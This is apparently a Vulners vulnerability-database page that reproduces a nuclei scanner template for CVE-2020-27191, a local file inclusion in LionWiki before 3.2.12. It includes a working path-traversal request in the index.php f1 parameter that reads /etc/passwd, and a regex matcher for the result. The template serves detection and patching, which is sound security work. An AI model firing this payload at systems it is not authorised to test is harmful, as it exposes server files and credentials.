Lucene search
K

LionWiki <3.2.12 - Local File Inclusion

šŸ—“ļøĀ 05 Jul 2026Ā 03:01:21Reported byĀ ProjectDiscoveryTypeĀ 
nuclei
Ā nuclei
šŸ”—Ā github.comšŸ‘Ā 33Ā Views

LionWiki 3.2.12 Local File Inclusion allows unauthenticated user to read sensitive files via crafted strings in index.php f1 variabl

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2020-27191
16 Nov 202016:15
–attackerkb
Circl
CVE-2020-27191
16 Nov 202018:37
–circl
CNNVD
Lionwiki Security Vulnerabilities
16 Nov 202000:00
–cnnvd
CVE
CVE-2020-27191
16 Nov 202015:17
–cve
Cvelist
CVE-2020-27191
16 Nov 202015:17
–cvelist
NVD
CVE-2020-27191
16 Nov 202016:15
–nvd
OSV
CVE-2020-27191
16 Nov 202016:15
–osv
Prion
Spoofing
16 Nov 202016:15
–prion
id: CVE-2020-27191

info:
  name: LionWiki <3.2.12 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: LionWiki before 3.2.12 allows an unauthenticated user to read files as the web server user via crafted strings in the index.php f1 variable, aka local file inclusion.
  impact: |
    An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data.
  remediation: |
    Upgrade LionWiki to version 3.2.12 or later to mitigate the LFI vulnerability.
  reference:
    - https://www.junebug.site/blog/cve-2020-27191-lionwiki-3-2-11-lfi
    - http://lionwiki.0o.cz/index.php?page=Main+page
    - https://nvd.nist.gov/vuln/detail/CVE-2020-27191
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2020-27191
    cwe-id: CWE-22
    epss-score: 0.08361
    epss-percentile: 0.94285
    cpe: cpe:2.3:a:lionwiki:lionwiki:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: lionwiki
    product: lionwiki
  tags: cve2020,cve,lionwiki,lfi,oss,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?page=&action=edit&f1=.//./\\.//./\\.//./\\.//./\\.//./\\.//./etc/passwd&restore=1"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0:"

      - type: status
        status:
          - 200
# digest: 490a00463044022049917820e3b407ef5cfedf5e85b5e7026a4547ec442b21a69fda8b8c1c5a00210220617e37f77a196eb54b9103572c407b0c2533da6a92a501fe13c03527450bf084:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation withĀ Vulners data

WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data

Api

Power your application withĀ Vulners API

The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access

App

Assess and manage vulnerabilities withĀ VulnersĀ tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.1High risk
Vulners AI Score7.1
CVSS 25
CVSS 3.17.5
EPSS0.08361
33